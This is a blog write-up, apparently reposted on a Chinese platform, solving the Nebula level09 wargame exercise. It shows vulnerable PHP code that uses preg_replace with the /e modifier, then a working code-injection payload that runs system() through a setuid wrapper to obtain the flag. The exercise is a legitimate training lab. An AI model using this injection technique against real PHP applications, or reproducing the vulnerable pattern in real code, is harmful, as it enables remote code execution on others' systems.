Nebula level09

最新推荐文章于 2017-02-26 21:27:08 发布

深夜航船

最新推荐文章于 2017-02-26 21:27:08 发布

阅读量7.9k

点赞数

分类专栏： exploit

exploit 专栏收录该内容

26 篇文章 0 订阅

订阅专栏

http://exploit-exercises.com/nebula/level09

There's a C setuid wrapper for some vulnerable PHP code...
To do this level, log in as the level09 account with the password level09 . Files for this level can be found in /home/flag09.

 1<?php
 2
 3function spam($email)
 4{
 5  $email = preg_replace("/\./", " dot ", $email);
 6  $email = preg_replace("/@/", " AT ", $email);
 7  
 8  return $email;
 9}
10
11function markup($filename, $use_me)
12{
13  $contents = file_get_contents($filename);
14
15  $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
16  $contents = preg_replace("/\[/", "<", $contents);
17  $contents = preg_replace("/\]/", ">", $contents);
18
19  return $contents;
20}
21
22$output = markup($argv[1], $argv[2]);
23
24print $output;
25
26?>

Well, I must admit that this time all was new to me. Let’s begin!

After initial parsing of the provided PHP script we can gather basic understanding of the logic along with some useful hints (oddly looking $use_me variable, regular expressions, and this whole preg_replace() function are most important).

The script works as follows: You provide the file which it tries to open, parse and print. If we want to hit spam() function we need to provide proper input, which looks like [email foo@bar.com]:

$ cat ~/pwn.txt [email foo@bar.com] $ ./flag09 ~/pwn.txt barfoo foo AT bar dot com

Now, onto the vulnerability.

If you google preg_replace() then one of the first hits is this, nothing special but we can understand a little bit better how to properly use this function.

Now, I didn’t have much experience in regular expressions so I read couple of tutorials but the one thing that did struck me was this "/(\[email (.*)\])/e" regexp, to be specific the letter "e" after slash. I did not stumbled upon this in any tutorial so I, again, googled it. Lo and behold this is what I found.

So, we already know the core issue here. We only need to connect the dots to craft an exploit.

From the above document and initial hints we do know that the malicious line in ~/pwn.txtneeds to look like [email {${eval($use_me)}}]. We will use $use_me variable (that comes from the second argument of our C wrapper) to provide arbitrary PHP code for eval(). And that should suffice:

$ cat ~/pwn.txt [email {${eval($use_me)}}] $ ./flag09 ~/pwn.txt "system(\"/bin/getflag\");" You have successfully executed getflag on a target account PHP Notice: Undefined variable: in /home/flag09/flag09.php(15) : regexp code on line 1

Another one bites the dust.

深夜航船

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Nebula level09

http://exploit-exercises.com/nebula/level09There's a C setuid wrapper for some vulnerable PHP code...To do this level, log in as the level09 account with the password level09 . Files for this
复制链接

扫一扫